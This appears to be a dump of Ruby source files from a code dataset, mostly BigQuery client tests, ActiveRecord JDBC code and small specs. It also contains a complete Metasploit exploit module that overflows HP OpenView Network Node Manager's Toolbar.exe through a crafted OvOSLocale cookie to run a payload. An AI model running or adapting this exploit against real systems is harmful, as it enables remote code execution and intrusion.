else
(@@_time ||= ActiveRecord::Type::Time.new).send(:cast_value, value)
end
end
# Memoized ActiveRecord::Type::DateTime instance (lazily built below).
# @private
@@_date_time = nil
# @private
def _string_to_timestamp(value)
if jdbc_column_class.respond_to?(:string_to_time)
jdbc_column_class.string_to_time(value)
else
(@@_date_time ||= ActiveRecord::Type::DateTime.new).send(:cast_value, value)
end
end
end
# Default the Java-side raw date-time/boolean handling (only when the flags
# were not explicitly configured). Both branches set the same defaults; on
# AR 4.0/4.1 neither branch runs, leaving the flags as configured.
if ActiveRecord::VERSION::MAJOR < 4 # emulating Rails 3.x compatibility
JdbcConnection.raw_date_time = true if JdbcConnection.raw_date_time?.nil?
JdbcConnection.raw_boolean = true if JdbcConnection.raw_boolean?.nil?
elsif ArJdbc::AR42 # AR::Type should do the conversion - for better accuracy
JdbcConnection.raw_date_time = true if JdbcConnection.raw_date_time?.nil?
JdbcConnection.raw_boolean = true if JdbcConnection.raw_boolean?.nil?
end
end
end
end
| 36.738304 | 108 | 0.633929 |
7a6b66cae88753c19b8c1978e32f9e7827430e26 | 121 | def solution(position, array)
array.each_index do |index|
return index if array[index] == position
end
return -1
end | 20.166667 | 42 | 0.743802 |
03a0450f399c5a961db182ebd2d67af59a8b5a5c | 11,856 | # Copyright 2015 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require "helper"
describe Google::Cloud::Bigquery::Table, :update, :mock_bigquery do
# Fixture identifiers and GAPI objects shared by all examples; `etag` is
# sent back in every PATCH request as the If-Match header value.
let(:dataset_id) { "my_dataset" }
let(:table_id) { "my_table" }
let(:table_name) { "My Table" }
let(:description) { "This is my table" }
let(:labels) { { "foo" => "bar" } }
let(:table_gapi) { random_table_gapi dataset_id, table_id, table_name, description }
let(:table) { Google::Cloud::Bigquery::Table.from_gapi table_gapi,
bigquery.service }
let(:schema) { table.schema.dup }
let(:etag) { "etag123456789" }
# Renaming sends only `friendly_name` (plus the guarding etag) in the
# PATCH body; all other table attributes must be left untouched.
it "updates its name" do
new_table_name = "My Updated Table"
mock = Minitest::Mock.new
table_hash = random_table_hash dataset_id, table_id, new_table_name, description
request_table_gapi = Google::Apis::BigqueryV2::Table.new friendly_name: "My Updated Table", etag: etag
# patch_table must carry an If-Match header with the current etag; the
# subsequent get_table reloads the table after the update.
mock.expect :patch_table, return_table(table_hash),
[project, dataset_id, table_id, request_table_gapi, {options: {header: {"If-Match" => etag}}}]
mock.expect :get_table, return_table(table_hash), [project, dataset_id, table_id]
table.service.mocked_service = mock
# State before the update.
_(table.name).must_equal table_name
_(table.description).must_equal description
_(table.schema.fields.count).must_equal schema.fields.count
_(table.time_partitioning_type).must_be_nil
_(table.time_partitioning_field).must_be_nil
_(table.time_partitioning_expiration).must_be_nil
_(table.require_partition_filter).must_equal true
_(table.clustering_fields).must_be_nil
table.name = new_table_name
# Only the name changed; everything else is preserved.
_(table.name).must_equal new_table_name
_(table.description).must_equal description
_(table.schema.fields.count).must_equal schema.fields.count
_(table.time_partitioning_type).must_be_nil
_(table.time_partitioning_field).must_be_nil
_(table.time_partitioning_expiration).must_be_nil
_(table.require_partition_filter).must_equal true
_(table.clustering_fields).must_be_nil
mock.verify
end
# Updating the description sends only `description` (guarded by the etag
# in an If-Match header); all other attributes must be left untouched.
it "updates its description" do
new_description = "This is my updated table"
mock = Minitest::Mock.new
table_hash = random_table_hash dataset_id, table_id, table_name, new_description
request_table_gapi = Google::Apis::BigqueryV2::Table.new description: "This is my updated table", etag: etag
mock.expect :patch_table, return_table(table_hash),
[project, dataset_id, table_id, request_table_gapi, {options: {header: {"If-Match" => etag}}}]
mock.expect :get_table, return_table(table_hash), [project, dataset_id, table_id]
table.service.mocked_service = mock
# State before the update.
_(table.name).must_equal table_name
_(table.description).must_equal description
_(table.schema.fields.count).must_equal schema.fields.count
_(table.time_partitioning_type).must_be_nil
_(table.time_partitioning_field).must_be_nil
_(table.time_partitioning_expiration).must_be_nil
_(table.require_partition_filter).must_equal true
table.description = new_description
# Only the description changed; everything else is preserved.
_(table.name).must_equal table_name
_(table.description).must_equal new_description
_(table.schema.fields.count).must_equal schema.fields.count
_(table.time_partitioning_type).must_be_nil
_(table.time_partitioning_field).must_be_nil
_(table.time_partitioning_expiration).must_be_nil
_(table.require_partition_filter).must_equal true
mock.verify
end
# Setting time_partitioning_type sends only the TimePartitioning(type)
# sub-resource (guarded by the etag in an If-Match header) and must leave
# every other attribute alone.
it "updates time partitioning type" do
type = "DAY"
mock = Minitest::Mock.new
table_hash = random_table_hash dataset_id, table_id, table_name, description
table_hash["timePartitioning"] = {
"type" => type,
}
partitioning = Google::Apis::BigqueryV2::TimePartitioning.new type: type
request_table_gapi = Google::Apis::BigqueryV2::Table.new time_partitioning: partitioning, etag: etag
mock.expect :patch_table, return_table(table_hash),
[project, dataset_id, table_id, request_table_gapi, {options: {header: {"If-Match" => etag}}}]
mock.expect :get_table, return_table(table_hash), [project, dataset_id, table_id]
table.service.mocked_service = mock
# State before the update.
_(table.name).must_equal table_name
_(table.description).must_equal description
_(table.schema.fields.count).must_equal schema.fields.count
_(table.time_partitioning_type).must_be_nil
_(table.time_partitioning_field).must_be_nil
_(table.time_partitioning_expiration).must_be_nil
_(table.require_partition_filter).must_equal true
table.time_partitioning_type = type
# Only the partitioning type changed; everything else is preserved.
_(table.name).must_equal table_name
_(table.description).must_equal description
_(table.schema.fields.count).must_equal schema.fields.count
_(table.time_partitioning_type).must_equal type
# Fix: assert the partitioning field is still unset after the update —
# this check was performed before the update and in the sibling
# partitioning examples, but was missing here.
_(table.time_partitioning_field).must_be_nil
_(table.time_partitioning_expiration).must_be_nil
_(table.require_partition_filter).must_equal true
mock.verify
end
# Setting time_partitioning_field sends only TimePartitioning(field)
# (guarded by the etag in an If-Match header) and must leave every other
# attribute alone.
it "updates time partitioning field" do
field = "dob"
mock = Minitest::Mock.new
table_hash = random_table_hash dataset_id, table_id, table_name, description
table_hash["timePartitioning"] = {
"field" => field,
}
partitioning = Google::Apis::BigqueryV2::TimePartitioning.new field: field
request_table_gapi = Google::Apis::BigqueryV2::Table.new time_partitioning: partitioning, etag: etag
mock.expect :patch_table, return_table(table_hash),
[project, dataset_id, table_id, request_table_gapi, {options: {header: {"If-Match" => etag}}}]
mock.expect :get_table, return_table(table_hash), [project, dataset_id, table_id]
table.service.mocked_service = mock
# State before the update.
_(table.name).must_equal table_name
_(table.description).must_equal description
_(table.schema.fields.count).must_equal schema.fields.count
_(table.time_partitioning_type).must_be_nil
_(table.time_partitioning_field).must_be_nil
_(table.time_partitioning_expiration).must_be_nil
_(table.require_partition_filter).must_equal true
table.time_partitioning_field = field
# Only the partitioning field changed; everything else is preserved.
_(table.name).must_equal table_name
_(table.description).must_equal description
_(table.schema.fields.count).must_equal schema.fields.count
_(table.time_partitioning_type).must_be_nil
_(table.time_partitioning_field).must_equal field
_(table.time_partitioning_expiration).must_be_nil
_(table.require_partition_filter).must_equal true
mock.verify
end
# The REST API takes the partition expiration in milliseconds while the
# library exposes seconds — hence the * 1_000 conversion on the request
# and the seconds value asserted after the update.
it "updates time partitioning expiration" do
expiration = 86_400
expiration_ms = expiration * 1_000
mock = Minitest::Mock.new
table_hash = random_table_hash dataset_id, table_id, table_name, description
table_hash["timePartitioning"] = {
"expirationMs" => expiration_ms,
}
partitioning = Google::Apis::BigqueryV2::TimePartitioning.new expiration_ms: expiration_ms
request_table_gapi = Google::Apis::BigqueryV2::Table.new time_partitioning: partitioning, etag: etag
mock.expect :patch_table, return_table(table_hash),
[project, dataset_id, table_id, request_table_gapi, {options: {header: {"If-Match" => etag}}}]
mock.expect :get_table, return_table(table_hash), [project, dataset_id, table_id]
table.service.mocked_service = mock
# State before the update.
_(table.name).must_equal table_name
_(table.description).must_equal description
_(table.schema.fields.count).must_equal schema.fields.count
_(table.time_partitioning_type).must_be_nil
_(table.time_partitioning_field).must_be_nil
_(table.time_partitioning_expiration).must_be_nil
_(table.require_partition_filter).must_equal true
table.time_partitioning_expiration = expiration
# Only the expiration changed (reported back in seconds).
_(table.name).must_equal table_name
_(table.description).must_equal description
_(table.schema.fields.count).must_equal schema.fields.count
_(table.time_partitioning_type).must_be_nil
_(table.time_partitioning_field).must_be_nil
_(table.time_partitioning_expiration).must_equal expiration
_(table.require_partition_filter).must_equal true
mock.verify
end
# Toggling require_partition_filter sends only that flag (guarded by the
# etag in an If-Match header); everything else must be left untouched.
it "updates require_partition_filter" do
mock = Minitest::Mock.new
table_hash = random_table_hash dataset_id, table_id, table_name, description
table_hash["requirePartitionFilter"] = false
request_table_gapi = Google::Apis::BigqueryV2::Table.new require_partition_filter: false, etag: etag
mock.expect :patch_table, return_table(table_hash),
[project, dataset_id, table_id, request_table_gapi, {options: {header: {"If-Match" => etag}}}]
mock.expect :get_table, return_table(table_hash), [project, dataset_id, table_id]
table.service.mocked_service = mock
# State before the update (the fixture reports the flag as true).
_(table.name).must_equal table_name
_(table.description).must_equal description
_(table.schema.fields.count).must_equal schema.fields.count
_(table.time_partitioning_type).must_be_nil
_(table.time_partitioning_field).must_be_nil
_(table.time_partitioning_expiration).must_be_nil
_(table.require_partition_filter).must_equal true
table.require_partition_filter = false
# Only the flag changed; everything else is preserved.
_(table.name).must_equal table_name
_(table.description).must_equal description
_(table.schema.fields.count).must_equal schema.fields.count
_(table.time_partitioning_type).must_be_nil
_(table.time_partitioning_field).must_be_nil
_(table.time_partitioning_expiration).must_be_nil
_(table.require_partition_filter).must_equal false
mock.verify
end
# Replacing the labels sends only the labels map (guarded by the etag in
# an If-Match header).
it "updates its labels" do
new_labels = { "bar" => "baz" }
mock = Minitest::Mock.new
bigquery.service.mocked_service = mock
table_hash = random_table_hash dataset_id, table_id, table_name, description
table_hash["labels"] = new_labels
request_table_gapi = Google::Apis::BigqueryV2::Table.new labels: new_labels, etag: etag
mock.expect :patch_table, return_table(table_hash),
[project, dataset_id, table_id, request_table_gapi, {options: {header: {"If-Match" => etag}}}]
mock.expect :get_table, return_table(table_hash), [project, dataset_id, table_id]
table.service.mocked_service = mock
# The writer replaces the whole map rather than merging into it.
_(table.labels).must_equal labels
table.labels = new_labels
_(table.labels).must_equal new_labels
mock.verify
end
# Setting a customer-managed encryption key sends only the
# EncryptionConfiguration (guarded by the etag in an If-Match header);
# the configuration read back must be frozen.
it "updates its encryption" do
kms_key = "path/to/encryption_key_name"
mock = Minitest::Mock.new
bigquery.service.mocked_service = mock
table_hash = random_table_hash dataset_id, table_id, table_name, description
table_hash["encryptionConfiguration"] = { kmsKeyName: kms_key }
request_table_gapi = Google::Apis::BigqueryV2::Table.new encryption_configuration: Google::Apis::BigqueryV2::EncryptionConfiguration.new(kms_key_name: kms_key), etag: etag
mock.expect :patch_table, return_table(table_hash),
[project, dataset_id, table_id, request_table_gapi, {options: {header: {"If-Match" => etag}}}]
mock.expect :get_table, return_table(table_hash), [project, dataset_id, table_id]
table.service.mocked_service = mock
_(table.encryption).must_be :nil?
encrypt_config = bigquery.encryption kms_key: kms_key
table.encryption = encrypt_config
_(table.encryption).must_be_kind_of Google::Cloud::Bigquery::EncryptionConfiguration
_(table.encryption.kms_key).must_equal kms_key
_(table.encryption).must_be :frozen?
mock.verify
end
# Round-trips a plain Hash fixture through JSON to build the GAPI Table
# object returned by the mocked service calls above.
def return_table table_hash
Google::Apis::BigqueryV2::Table.from_json(table_hash.to_json)
end
end
| 41.166667 | 175 | 0.751771 |
62695fdcae344ccc22ca46cb5aee3a7a24b48c54 | 3,261 | ## --- BEGIN LICENSE BLOCK ---
# Copyright (c) 2009, Mikio L. Braun
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# * Neither the name of the Technische Universität Berlin nor the
# names of its contributors may be used to endorse or promote
# products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
## --- END LICENSE BLOCK ---
require 'set'
require 'config/config'
module Path
PATH = ENV['PATH'].split(':')
module_function
# Search +path+ (an array of directories, defaulting to the process PATH)
# for +file+ and return the first directory containing it, or nil when it
# is nowhere to be found. When a block is given, a directory only counts
# as a hit if the block returns truthy for the full candidate path.
def where(file, path=PATH)
  path.each do |directory|
    candidate = File.join(directory, file)
    next unless File.exist? candidate
    return directory unless block_given?
    return directory if yield candidate
  end
  nil
end
# returns the path to the command as specified by
# line or nil if the command does not exist, or
# it did not produce the right result
def where_with_output(line, output)
  # Locate the command named at the start of +line+, run the full line from
  # that directory and return the directory when its output matches
  # +output+; nil when the command is missing or the output does not match.
  command = line.split[0]
  found = where(command)
  return unless found
  result = %x(#{File.join(found, line)})
  result =~ output ? found : nil
end
# Check whether a cmd could be found.
# Check whether each given command can be found on the PATH.
#
# Logs every lookup and aborts the configuration run (via Config.fail) as
# soon as a command cannot be located.
#
# @param cmds [Array<String>] command names to look for
# @yield [self] invoked once after all commands were found
def check_cmd(*cmds)
  cmds.each do |cmd|
    Config.log "Searching for command #{cmd}"
    # Fix: the failure message previously read "coulnd't".
    Config.fail("couldn't find command #{cmd}") unless Path.where cmd
  end
  yield self if block_given?
  return
end
# Check whether files could be found in the given path.
# Check whether each given file exists under +path+. Every entry in
# +files+ may itself be an array of path components (splatted into
# File.join); a missing file aborts the run via Config.fail.
def check_files(path, *files)
  files.each do |components|
    target = File.join(path, *components)
    Config.log "Searching for file #{target}"
    Config.fail("couldn't find #{target}") unless File.exist? target
  end
  yield if block_given?
  return
end
# translate dir (mainly necessary for cygwin)
# Translate a directory path for the current platform; on Windows the
# backslashes are escaped and the path converted to a cygwin (POSIX) path
# via cygpath. Any other OS gets the path back unchanged.
def dir(s)
  return s unless Config::CONFIG['OS_NAME'] == 'Windows'
  escaped = s.gsub(/\\/, '\\\\\\\\')
  %x(cygpath -u '#{escaped}').chomp
end
end | 30.476636 | 72 | 0.671266 |
381e2cbf6a59e2864f3310b40ad034de14e32eb3 | 462 | # frozen_string_literal: true
module Jfuzz
# Abstract base class for property fuzz generators. Concrete subclasses
# are expected to override .type (class level) and #generate (instance
# level); #try_generate is the public entry point.
class Generator
# @param property the property to generate a fuzzed value for
# @param property_fuzzer fuzzer passed in for use by subclasses
def initialize(property, property_fuzzer)
@property = property
@property_fuzzer = property_fuzzer
end
# Public entry point; currently just delegates to the subclass #generate.
def try_generate
generate
end
# Identifier of the property type this generator handles; must be
# overridden by each subclass.
def self.type
raise "`type` must be implemented by sub class"
end
private
# Produces a single fuzzed value; must be overridden by each subclass.
def generate
raise "`generate` must be implemented by sub class"
end
# NOTE: declared below `private`, so these readers are private helpers
# for subclasses, not part of the public interface.
attr_reader :property, :property_fuzzer
end
end
| 17.111111 | 57 | 0.675325 |
6a2469a8961fac9060bd143b9f71f83fd10ec19e | 433 | require_relative 'test_helper'
require 'import_controller'
require 'options'
class ImportControllerTest < Minitest::Test
include TestHelper
include FileSystemTestMixin
# Placeholder example: keeps the suite green while the controller has no
# real coverage yet (the commented lines hint at intended probes).
def test_untested
# p test_options.filename
# p subject.yaml_file_path
assert true
end
# System under test, built from the shared test options/config helpers.
def subject
ImportController.new test_options, test_config
end
# Each test runs against a fresh temporary directory (see
# FileSystemTestMixin helpers used below).
def setup
init_temp_dir
end
def teardown
destroy_temp_dir
end
end
| 16.037037 | 50 | 0.759815 |
b9af5de8d0f2681aa677654e589b14700770e003 | 719 | require 'rails_helper'
RSpec.describe UserDatatable, type: :datatable do
# Datatable under test: built with a stubbed view (only #params is used)
# and scoped to the current account via options.
let(:user_datatable) do
described_class.new(instance_double('view', params: params),
options)
end
let(:account) { create(:account) }
let(:user) { create(:user, account: account) }
# supporting data
let(:params) do
ActionController::Parameters.new('columns': {})
end
let(:options) do
{
current_account: account
}
end
# Force creation of the user record before the datatable renders.
before { user }
describe '#to_json' do
# Exactly one matching record, exposing the user's email.
let(:expected_json) do
{
"recordsTotal": 1,
"data": [{
email: user.email
}]
}
end
it { expect(user_datatable.to_json).to include_json(expected_json) }
end
end
| 20.542857 | 72 | 0.603616 |
2119ef254a9bc5e56d3e728653200ccbffc6fed5 | 148 | require 'rails_helper'
# Auto-generated view spec scaffold: `pending` marks this example group as
# not yet implemented until real examples are added (or the file removed).
RSpec.describe "tag_xy/viewPage_name.html.erb", type: :view do
pending "add some examples to (or delete) #{__FILE__}"
end
| 24.666667 | 62 | 0.75 |
08adb256c0d7368321d620c9a4dba7dd9b6fe9de | 196 | require File.expand_path('../../../spec_helper', __FILE__)
require File.expand_path('../shared/trace', __FILE__)
require 'matrix'
# Delegates the actual examples to the shared :trace example group
# (required above); exercises Matrix#trace under the :trace method name.
describe "Matrix#trace" do
it_behaves_like(:trace, :trace)
end
| 24.5 | 58 | 0.734694 |
d53f58ec5b2163954561196adfd48ebe58df6596 | 5,341 | ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
# Registers the module metadata. The offsets, return addresses and pointer
# constants under 'Targets' are specific to the two NNM builds named there
# (see the module description); the payload is alphanumeric-encoded with
# its start address expected in EDX (see 'EncoderOptions').
def initialize(info = {})
super(update_info(info,
'Name' => 'HP OpenView Network Node Manager Toolbar.exe CGI Cookie Handling Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.0
and 7.53. By sending a CGI request with a specially OvOSLocale cookie to Toolbar.exe, an
attacker may be able to execute arbitrary code. Please note that this module only works
against a specific build (ie. NNM 7.53_01195)
},
'License' => MSF_LICENSE,
'Author' =>
[
'Oren Isacson', # original discovery
'juan vazquez', # metasploit module (7.0 target)
'sinn3r', # 7.53_01195 target
],
'References' =>
[
[ 'CVE', '2009-0920' ],
[ 'OSVDB', '53242' ],
[ 'BID', '34294' ],
[ 'URL', 'http://www.coresecurity.com/content/openview-buffer-overflows']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Privileged' => false,
# Bad characters below match the per-target sets documented at the
# bottom of this file.
'Payload' =>
{
'Space' => 4000,
'BadChars' => "\x01\x02\x03\x04\x05\x06\x07\x08\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x7f\x3b\x2b",
'DisableNops' => true, # no need
'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
'EncoderOptions' =>
{
'BufferRegister' => 'EDX'
}
},
'Platform' => 'win',
'Targets' =>
[
[
#Windows XP SP3
'HP OpenView Network Node Manager Release B.07.00',
{
'Ret' => 0x5A212147, # ovsnmp.dll call esp
'Offset' => 0xFC, # until EIP
# Pointer to string with length < 0x100
# Avoid crash before vulnerable function returns
# And should work as a "NOP" since it will prepend shellcode
#'ReadAddress' => 0x5A03A225,# ov.dll
'ReadAddress' => 0x5A03A225,# ov.dll
'EDXAdjust' => 0x17,
# 0x8 => offset until "0x90" nops
# 0x4 => "0x90" nops
# 0x2 => len(push esp, pop edx)
# 0x3 => len(sub)
# 0x6 => len(add)
}
],
[
#Windows Server 2003
'HP OpenView Network Node Manager 7.53 Patch 01195',
{
'Eax' => 0x5a456eac, #Readable address for CMP BYTE PTR DS:[EAX],0
'EaxOffset' => 251, #Offset to overwrite EAX
'Ret' => 0x5A23377C, #CALL EDI
'Max' => 8000, #Max buffer size
}
]
],
'DisclosureDate' => 'Jan 21 2009'))
end
# Builds the per-target overflow string and delivers it in the OvOSLocale
# cookie of a GET request to /OvCgi/Toolbar.exe. Both buffers start with
# the literal locale prefix "en_US" so the cookie still parses as a locale.
def exploit
if target.name =~ /7\.53/
#EDX alignment for alphanumeric shellcode
#payload is in EDI first. We exchange it with EDX, align EDX, and then
#jump to it.
align = "\x87\xfa" #xchg edi,edx
align << "\x80\xc2\x27" #add dl,0x27
align << "\xff\xe2" #jmp edx
#Add the alignment code to payload
p = align + payload.encoded
sploit = 'en_US'
sploit << rand_text_alphanumeric(247)
sploit << [target.ret].pack('V*')
# Overwrite EAX with a readable address so the CMP BYTE PTR [EAX],0 in
# the vulnerable path survives until the overwritten return is used.
sploit << rand_text_alphanumeric(target['EaxOffset']-sploit.length+'en_US'.length)
sploit << [target['Eax']].pack('V*')
sploit << rand_text_alphanumeric(3200)
sploit << make_nops(100 - align.length)
sploit << align
sploit << p
# Pad to the fixed buffer size this build expects.
sploit << rand_text_alphanumeric(target['Max']-sploit.length)
elsif target.name =~ /B\.07\.00/
edx = Rex::Arch::X86::EDX
sploit = "en_US"
sploit << rand_text_alphanumeric(target['Offset'] - "en_US".length, payload_badchars)
sploit << [target.ret].pack('V')
sploit << [target['ReadAddress']].pack('V')
sploit << "\x90\x90\x90\x90"
# Get in EDX a pointer to the shellcode start
sploit << "\x54" # push esp
sploit << "\x5A" # pop edx
sploit << Rex::Arch::X86.sub(-(target['EDXAdjust']), edx, payload_badchars, false, true)
sploit << "\x81\xc4\x48\xf4\xff\xff" # add esp, -3000
sploit << payload.encoded
end
#Send the malicious request to /OvCgi/ToolBar.exe
#If the buffer contains a badchar, NNM 7.53 will return a "400 Bad Request".
#If the exploit causes ToolBar.exe to crash, NNM returns "error in CGI Application"
send_request_raw({
'uri' => "/OvCgi/Toolbar.exe",
'method' => "GET",
'cookie' => "OvOSLocale=" + sploit + "; OvAcceptLang=en-usa",
}, 20)
handler
disconnect
end
end
=begin
NNM B.07.00's badchar set:
00 0D 0A 20 3B 3D 2C 2B
NNM 7.53_01195's badchar set:
01 02 03 04 05 06 07 08 0a 0b 0c 0d 0e 0f 10 11 ................
12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 7f ...............
3b = delimiter
2b = gets converted to 0x2b
=end
| 34.019108 | 165 | 0.544467 |
1a138a3c3d9deaa4e5620f32d40b172fba84628b | 350 | require "test_helper"
# Verifies Reform's `writeable: false` option: such properties must be
# reported as read-only by Form#readonly?.
class ReadonlyTest < MiniTest::Spec
class SongForm < Reform::Form
property :artist
property :title, writeable: false
# TODO: what to do with virtual values?
end
let (:form) { SongForm.new(OpenStruct.new) }
# :artist is a normal property; :title was declared writeable: false.
it { form.readonly?(:artist).must_equal false }
it { form.readonly?(:title).must_equal true }
end | 25 | 49 | 0.7 |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.